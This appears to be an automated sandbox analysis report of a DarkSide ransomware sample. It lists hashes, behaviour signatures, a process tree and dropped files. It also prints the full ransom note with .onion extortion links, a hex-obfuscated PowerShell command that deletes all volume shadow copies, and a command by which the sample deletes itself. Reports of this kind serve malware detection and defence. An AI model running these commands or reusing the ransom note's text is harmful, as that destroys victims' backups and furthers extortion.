Overview

overview

10

Static

static

3

Darkside.exe

windows7-x64

10

Darkside.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    117s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-08-2024 10:31

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Darkside.exe

  • Size

    59KB

  • MD5

    cfcfb68901ffe513e9f0d76b17d02f96

  • SHA1

    766b30e5a37d1bc8d8fe5c7cacc314504a44ac1f

  • SHA256

    17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61

  • SHA512

    0d26fa9478f4626107e38c570d1bae1049b744181cf0395d95fb07675575ca393d88d4783bf31bdf11bef1da5648a5a53a6d95b21492f96b4de35c0ec323ae0c

  • SSDEEP

    768:9jjV7Iax7F3DS4/S96/P3rsAc4ci5pwwX5+R4VYY23W5:vx7Fu4/i6/P3rlckx5+R4VDZ5

Score
10/10
darksidecredential_accessdefense_evasiondiscoveryexecutionransomwarespywarestealer

Malware Config

Extracted

Path

C:\Users\Admin\README.0b553531.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. Data leak ---------------------------------------------- First of all we have uploaded more then 90 GB data. These files include: Finance data Insurance data Buchgalting Data Banking data and details, bank contracts, creditors info Much personal data Marketing data Production, Technik data Email conversations dump and more others. All documents are fresh (last 365 days) and stored on our offline servers. All data will be published piece by piece. First data pack will be published in 7 days if we do not come for agreement. Your personal leak page: http://darksidedxcftmqa.onion/polifilm/AWeu5Sv7zTTCTjZD8YkgoPRznfE5r7G-vbsXok9EvfiaNL_eDwRlgRMruMHisnEF On the page you will find examples of files that have been stolen. The data is preloaded and will be automatically published if you do not pay. After publication, your data will be available for at least 6 months on our tor cdn servers. We are ready: - To provide you the evidence of stolen data - To delete all the stolen data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/2AHUVJ3VGS97NUG5J5EYMQM5PJO77V9V0GDT3UYIJGFZUTOQRLUX593CQ2EZ2ZEH When you open our website, put the following data in the input form: Key: rIzr2nCuqbQL7MGMwoppaucqSp5AZufUiYhssYa1SGfO0XFf09fBDlLDWgKQSnnvIAfqYTsOgUhOTxzbxGsC9nH0yk2HOFhn7t8ntX8L0evyce8vKdgUKF7Xvjn6ljaQQ4HPEfPZFP2jvN0DgBVWl2WgNT1U3owZ1bNBjps34t33ObZc01Ce1yKx5CSlwUYbw1ktjqt5d7R9DwRL3NIGrTHvMX3qXI5aBAUnirnc4zHtfGPXq4CuFoh04Tv7VE81aohfvuz8D7wo7i28sbILoJyF6mzeQwSkAXolOhXKQAEPsGcdbfLxfY5uILkHB3d1gAyxT1owQXsY4heNQbY3yYL1Em7dDaLdbNhOf0adYWFiFfAl9EwLDRT96L9Xzsk17ho1B82wOWZ79ZqtT8yqnZ4APJb1LO91ASSsgUdNvR0lAaZTfXHHxUI1vDm5ygyV7cbxMlrQ5K1U6ughdd5WosogMJWVNjreirhzuDzY6SnixtukGYG0D9azzgOHcgidJcLV4n0orhzIaA1SMNYOpdOIadgBehCaHwEyr3hn8CEa6fgpUgK6E95 !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidedxcftmqa.onion/polifilm/AWeu5Sv7zTTCTjZD8YkgoPRznfE5r7G-vbsXok9EvfiaNL_eDwRlgRMruMHisnEF

http://darksidfqzcuhtk2.onion/2AHUVJ3VGS97NUG5J5EYMQM5PJO77V9V0GDT3UYIJGFZUTOQRLUX593CQ2EZ2ZEH

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

    ransomwaredarkside
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Renames multiple (146) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

    credential_accessstealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

    defense_evasion
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
    ransomware
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Control Panel 1 IoCs
    evasion
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\Darkside.exe
    "C:\Users\Admin\AppData\Local\Temp\Darkside.exe"
    1⤵
    • Checks computer location settings
    • Sets desktop wallpaper using registry
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3016
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3380
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\Darkside.exe >> NUL
      2⤵
      • System Location Discovery: System Language Discovery
      PID:968
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:4328

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    556084f2c6d459c116a69d6fedcc4105

    SHA1

    633e89b9a1e77942d822d14de6708430a3944dbc

    SHA256

    88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

    SHA512

    0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    71444def27770d9071039d005d0323b7

    SHA1

    cef8654e95495786ac9347494f4417819373427e

    SHA256

    8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9

    SHA512

    a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kaueu2qb.nhz.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\README.0b553531.TXT
    Filesize

    3KB

    MD5

    b58e2411168bbdbec635cf4001635db0

    SHA1

    c130cd9caaaa514a6b98c1168e10d44a989d191a

    SHA256

    652a74736e10402013fae584c967fc5ea3b7c2eac0a436d41759963b3d42e37a

    SHA512

    87e2c3ecf3805a7b3945eed4472548a63cbaee7c004c3bce220524e1c6733b3eb780812b4d336f6b72a365c161c02e18b8101e405d00507ff902e88dd49ba30a

    Download Submit

  • memory/3380-2-0x00007FFF76753000-0x00007FFF76755000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3380-3-0x000001B4EC3B0000-0x000001B4EC3D2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3380-13-0x00007FFF76750000-0x00007FFF77211000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3380-14-0x00007FFF76750000-0x00007FFF77211000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3380-15-0x00007FFF76750000-0x00007FFF77211000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3380-18-0x00007FFF76750000-0x00007FFF77211000-memory.dmp

    Filesize

    10.8MB

    Download